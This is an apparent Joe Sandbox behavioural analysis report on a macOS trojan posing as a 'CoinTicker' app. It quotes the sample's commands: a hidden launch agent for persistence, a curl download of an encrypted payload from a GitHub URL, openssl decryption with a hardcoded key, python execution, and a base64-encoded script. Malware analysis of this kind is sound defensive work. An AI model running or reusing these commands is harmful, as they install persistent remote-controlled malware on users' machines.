Loading ...

Analysis Report xqnTwFKnuR

Overview

General Information

Joe Sandbox Version:24.0.0
Analysis ID:63329
Start date:02.11.2018
Start time:10:57:17
Joe Sandbox Product:Cloud
Overall analysis duration:0h 12m 54s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:xqnTwFKnuR (renamed file extension from none to app)
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection:MAL
Classification:mal60.troj.spyw.macAPP@0/21@10/0

Detection

StrategyScoreRangeReportingDetection
Threshold600 - 100Report FP / FNmalicious

Classification

Signature Overview

Click to jump to signature section


Cryptography:

barindex
Decrypts dropped files with the "openssl" commandShow sources
Source: /bin/sh (PID: 712)Openssl decryption: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 724)Openssl decryption: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 729)Openssl decryption: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 734)Openssl decryption: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Executes the "openssl" command used for cryptographic operationsShow sources
Source: /bin/sh (PID: 712)Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 724)Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 729)Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 734)Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior

Networking:

barindex
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.0.50:49239 -> 185.206.144.226:1339
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 17.188.165.205
Source: unknownTCP traffic detected without corresponding DNS query: 17.252.92.75
Source: unknownTCP traffic detected without corresponding DNS query: 17.252.92.75
Source: unknownTCP traffic detected without corresponding DNS query: 17.188.165.205
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /MFgwVqADAgEAME8wTTBLMAkGBSsOAwIaBQAEFH7maudymrP8%2BKIgZGwWoS1gcQhdBBSoSmpjBH3duubRObemRWXv86jsoQISBEPFo0kDZ%2BqvsHbeCoThsluI HTTP/1.1Host: ocsp.int-x3.letsencrypt.orgConnection: closeUser-Agent: trustd (unknown version) CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: github.com
Reads from file descriptors related to (network) socketsShow sources
Source: /usr/bin/curl (PID: 710)Reads from socket in process: dataJump to behavior
Source: /usr/bin/curl (PID: 723)Reads from socket in process: dataJump to behavior
Source: /usr/bin/curl (PID: 728)Reads from socket in process: dataJump to behavior
Source: /usr/bin/curl (PID: 733)Reads from socket in process: dataJump to behavior
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49249
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49248
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49246
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49245
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49242
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49241
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49240
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49251
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49250
Source: unknownNetwork traffic detected: HTTP traffic on port 49248 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49249 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49246 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49245 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49242 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49240 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49241 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49251 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49250 -> 443
Writes from file descriptors related to (network) socketsShow sources
Source: /usr/bin/curl (PID: 710)Writes from socket in process: dataJump to behavior
Source: /usr/bin/curl (PID: 723)Writes from socket in process: dataJump to behavior
Source: /usr/bin/curl (PID: 728)Writes from socket in process: dataJump to behavior
Source: /usr/bin/curl (PID: 733)Writes from socket in process: dataJump to behavior

Spam, unwanted Advertisements and Ransom Demands:

barindex
Writes HTML files containing JavaScript to diskShow sources
Source: /usr/bin/curl (PID: 710)HTML file containing JavaScript created: /private/tmp/.info.enc
Source: /usr/bin/curl (PID: 723)HTML file containing JavaScript created: /private/tmp/.info.enc
Source: /usr/bin/curl (PID: 728)HTML file containing JavaScript created: /private/tmp/.info.enc
Source: /usr/bin/curl (PID: 733)HTML file containing JavaScript created: /private/tmp/.info.encJump to dropped file

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal60.troj.spyw.macAPP@0/21@10/0

Persistence and Installation Behavior:

barindex
Explicitly loads/starts launch services based on hidden plist filesShow sources
Source: /bin/bash (PID: 708)Hidden launch agent/daemon loaded: launchctl load /Users/henry/Library/LaunchAgents/.espl.plistJump to behavior
Many shell processes execute programs via execve syscall (may be indicative of malicious behavior)Show sources
Source: /bin/sh (PID: 701)Shell process: /sbin/ifconfigJump to behavior
Source: /bin/sh (PID: 710)Shell process: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /bin/sh (PID: 712)Shell process: openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 713)Shell process: python /tmp/.info.pyJump to behavior
Source: /bin/sh (PID: 723)Shell process: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /bin/sh (PID: 724)Shell process: openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 725)Shell process: python /tmp/.info.pyJump to behavior
Source: /bin/sh (PID: 728)Shell process: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /bin/sh (PID: 729)Shell process: openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 730)Shell process: python /tmp/.info.pyJump to behavior
Source: /bin/sh (PID: 733)Shell process: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /bin/sh (PID: 734)Shell process: openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 735)Shell process: python /tmp/.info.pyJump to behavior
Creates hidden files, links and/or directoriesShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Hidden file created: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeWJump to behavior
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Hidden file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeW -> /Users/henry/Library/LaunchAgents/.espl.plistJump to behavior
Source: /usr/bin/curl (PID: 710)Hidden file created: /tmp/.info.encJump to behavior
Source: /usr/bin/openssl (PID: 712)Hidden file created: /tmp/.info.pyJump to behavior
Creates launch services that start periodicallyShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Launch agent/daemon created with StartInterval and/or StartCalendarInterval, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeW -> /Users/henry/Library/LaunchAgents/.espl.plistJump to behavior
Executes commands using a shell command-line interpreterShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Shell command executed: /bin/bash -c echo IyAtKi0gY29kaW5nOiB1dGYtOCAtKi0KaW1wb3J0IHVybGxpYjIKZnJvbSBiYXNlNjQgaW1wb3J0IGI2NGVuY29kZSwgYjY0ZGVjb2RlCmltcG9ydCBnZXRwYXNzCmZyb20gdXVpZCBpbXBvcnQgZ2V0bm9kZQpmcm9tIGJpbmFzY2lpIGltcG9ydCBoZXhsaWZ5CgoKZGVmIGdldF91aWQoKToKICAgIHJldHVybiBoZXhsaWZ5KGdldHBhc3MuZ2V0dXNlcigpICsgIi0iICsgc3RyKGdldG5vZGUoKSkpCgoKdFlYWEZkVGp4UFFjdXJMID0gImtQMEJvZmJwQ084YnVlUSIKZGF0YSA9IHsKICAgICJDb29raWUiOiAic2Vzc2lvbj0iICsgYjY0ZW5jb2RlKGdldF91aWQoKSkgKyAiLWV5SjBlWEJsSWpvZ01Dd2dJbkJoZVd4dllXUmZiM0IwYVc5dWN5STZJSHNpYUc5emRDSTZJQ0l4T0RVdU1qQTJMakUwTkM0eU1qWWlMQ0FpY0c5eWRDSTZJREV6TXpsOUxDQWliRzloWkdWeVgyOXdkR2x2Ym5NaU9pQjdJbXh2WVdSbGNsOXVZVzFsSWpvZ0lteGhkVzVqYUY5a1lXVnRiMjRpTENBaWJHRjFibU5vWDJGblpXNTBYMjVoYldVaU9pQWlZMjl0TG1Gd2NHeGxMa1ZQUmtoWWNGRjJjV2h5SWl3Z0luQmhlV3h2WVdSZlptbHNaVzVoYldVaU9pQWljR3hSY1ZabVpVcDJSMjhpTENBaWNISnZaM0poYlY5a2FYSmxZM1J2Y25raU9pQWlmaTlNYVdKeVlYSjVMME52Ym5SaGFXNWxjbk12TGxWd1VWcGthR3RMWmtOa1UxbDRaeUo5ZlE9PSIsCiAgICAiVXNlci1BZ2VudCI6ICJNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xM18zKSBJump to behavior
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Shell command executed: /bin/bash -c sleep 1 launchctl unload /Users/henry/Library/LaunchAgents/.espl.plist launchctl load /Users/henry/Library/LaunchAgents/.espl.plistJump to behavior
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Shell command executed: /bin/bash -c launchctl list | grep 'espl'Jump to behavior
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Shell command executed: /bin/bash -c sw_versJump to behavior
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Shell command executed: /bin/bash -c test -e /tmp/.info.py && echo 'Yes' || echo 'No'Jump to behavior
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Shell command executed: /bin/bash -c test -e /tmp/.server.sh && echo 'Yes' || echo 'No'Jump to behavior
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Shell command executed: /bin/bash -c test -e /Users/henry/Library/LaunchAgents/.espl.plist && echo 'Yes' || echo 'No'Jump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699)Shell command executed: sh -c LC_ALL=C /sbin/ifconfig 2>/dev/nullJump to behavior
Source: /usr/bin/sh (PID: 709)Shell command executed: sh -c nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq python /tmp/.info.pyJump to behavior
Source: /usr/bin/sh (PID: 722)Shell command executed: sh -c nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq python /tmp/.info.pyJump to behavior
Source: /usr/bin/sh (PID: 727)Shell command executed: sh -c nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq python /tmp/.info.pyJump to behavior
Source: /usr/bin/sh (PID: 732)Shell command executed: sh -c nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq python /tmp/.info.pyJump to behavior
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)Show sources
Source: /usr/bin/nohup (PID: 710)Curl executable: /usr/bin/curl -> curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /usr/bin/nohup (PID: 723)Curl executable: /usr/bin/curl -> curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /usr/bin/nohup (PID: 728)Curl executable: /usr/bin/curl -> curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /usr/bin/nohup (PID: 733)Curl executable: /usr/bin/curl -> curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Executes the "grep" command used to find patterns in files or piped streamsShow sources
Source: /bin/bash (PID: 716)Grep executable: /usr/bin/grep -> grep esplJump to behavior
Executes the "nohup" (no hangup) command used to avoid background terminal process from being killedShow sources
Source: /bin/sh (PID: 710)Nohup executable: /usr/bin/nohup -> nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /bin/sh (PID: 723)Nohup executable: /usr/bin/nohup -> nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /bin/sh (PID: 728)Nohup executable: /usr/bin/nohup -> nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /bin/sh (PID: 733)Nohup executable: /usr/bin/nohup -> nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Executes the "python" command used to interpret Python scriptsShow sources
Source: /bin/bash (PID: 699)Python executable: /Library/Frameworks/Python.framework/Versions/2.7/bin/python -> pythonJump to behavior
Source: /bin/sh (PID: 713)Python executable: /usr/bin/python -> python /tmp/.info.pyJump to behavior
Source: /bin/sh (PID: 725)Python executable: /usr/bin/python -> python /tmp/.info.pyJump to behavior
Source: /bin/sh (PID: 730)Python executable: /usr/bin/python -> python /tmp/.info.pyJump to behavior
Source: /bin/sh (PID: 735)Python executable: /usr/bin/python -> python /tmp/.info.pyJump to behavior
Explicitly lists launch services possibly for searchingShow sources
Source: /bin/bash (PID: 715)Launch agent/daemon listed: launchctl listJump to behavior
Explicitly loads/starts launch servicesShow sources
Source: /bin/bash (PID: 708)Launch agent/daemon loaded: launchctl load /Users/henry/Library/LaunchAgents/.espl.plistJump to behavior
Explicitly unloads, stops, and/or removes launch servicesShow sources
Source: /bin/bash (PID: 707)Launch agent/daemon unloaded: launchctl unload /Users/henry/Library/LaunchAgents/.espl.plistJump to behavior
Keeps child processes alive after launchd jobs dieShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Launch agent/daemon created with AbandonProcessGroup, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeW -> /Users/henry/Library/LaunchAgents/.espl.plistJump to behavior
Reads launchservices plist filesShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Reads user launchservices plist file containing default apps for corresponding file typesShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)Show sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plistJump to behavior
App bundle is code signedShow sources
Source: Submitted file: xqnTwFKnuR.appCodeResources XML file: CodeResources
Source: Submitted file: xqnTwFKnuR.appCodeResources XML file: CodeResources
Reads data from the local random generatorShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Random device file read: /dev/urandomJump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699)Random device file read: /dev/urandomJump to behavior
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Uses the Python frameworkShow sources
Source: /Library/Frameworks/Python.framework/Versions/2.7/bin/python (PID: 699)Python framework application: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /usr/bin/python (PID: 713)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /usr/bin/python (PID: 725)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /usr/bin/python (PID: 730)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /usr/bin/python (PID: 735)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Writes property list (.plist) files to diskShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)XML plist file created: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeWJump to dropped file
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)XML plist file created: /Users/henry/Documents/coins.plistJump to dropped file

Boot Survival:

barindex
Creates memory-persistent launch servicesShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Launch agent/daemon created with KeepAlive and/or RunAtLoad, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeW -> /Users/henry/Library/LaunchAgents/.espl.plistJump to behavior
Creates user-wide 'launchd' managed services aka launch agentsShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Launch agent created file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeW -> /Users/henry/Library/LaunchAgents/.espl.plistJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Executes the "base64" command used to encode or decode data (e.g. files, payloads)Show sources
Source: /bin/bash (PID: 698)Base64 executable: /usr/bin/base64 -> base64 --decodeJump to behavior

Malware Analysis System Evasion:

barindex
Executes the "sleep" command used to delay execution and potentially evade sandboxesShow sources
Source: /bin/bash (PID: 706)Sleep executable: /bin/sleep -> sleep 1Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)Show sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Sysctl read request: kern.safeboot (1.66)Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries OS software version with shell command 'sw_vers'Show sources
Source: /bin/bash (PID: 718)sw_vers executed: sw_versJump to behavior
Reads hardware related sysctl valuesShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Sysctl read request: hw.availcpu (6.25)Jump to behavior
Reads the systems OS release and/or typeShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Reads the systems hostnameShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/bash (PID: 696)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 700)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/bash (PID: 705)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/bash (PID: 714)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/bash (PID: 718)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/bash (PID: 719)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/bash (PID: 720)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/bash (PID: 721)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 709)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 722)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 727)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 732)Sysctl requested: kern.hostname (1.10)Jump to behavior
Reads the system or server version plist fileShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /usr/bin/sw_vers (PID: 718)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 713)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 713)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 725)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 725)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 730)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 730)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 735)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 735)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior

Stealing of Sensitive Information:

barindex
Executes the "ifconfig" command used to gather network informationShow sources
Source: /bin/sh (PID: 701)Ifconfig executable: /sbin/ifconfig -> /sbin/ifconfigJump to behavior


Runtime Messages

Command:open
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 63329 Sample: xqnTwFKnuR Startdate: 02/11/2018 Architecture: MAC Score: 60 57 185.206.144.226, 1339 BELCLOUDBG Bulgaria 2->57 59 api.manana.kr 133.130.107.154, 443, 49242 INTERQGMOInternetIncJP Japan 2->59 61 12 other IPs or domains 2->61 10 xpcproxy CoinTicker 8 2->10         started        12 xpcproxy sh sh 2->12         started        14 xpcproxy sh sh 2->14         started        16 2 other processes 2->16 signatures3 63 Detected TCP or UDP traffic on non-standard ports 57->63 process4 process5 18 bash 10->18         started        29 6 other processes 10->29 20 sh openssl 1 12->20         started        31 2 other processes 12->31 23 sh openssl 14->23         started        33 2 other processes 14->33 25 sh openssl 16->25         started        27 sh openssl 16->27         started        35 4 other processes 16->35 signatures6 37 bash python Python 18->37         started        39 bash base64 18->39         started        41 bash 18->41         started        65 Decrypts dropped files with the "openssl" command 20->65 67 Many shell processes execute programs via execve syscall (may be indicative of malicious behavior) 20->67 43 bash launchctl 29->43         started        46 bash launchctl 29->46         started        48 bash grep 29->48         started        50 2 other processes 29->50 process7 signatures8 52 sh 37->52         started        73 Explicitly loads/starts launch services based on hidden plist files 43->73 process9 process10 54 sh ifconfig 52->54         started        signatures11 69 Executes the "ifconfig" command used to gather network information 54->69 71 Many shell processes execute programs via execve syscall (may be indicative of malicious behavior) 54->71

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots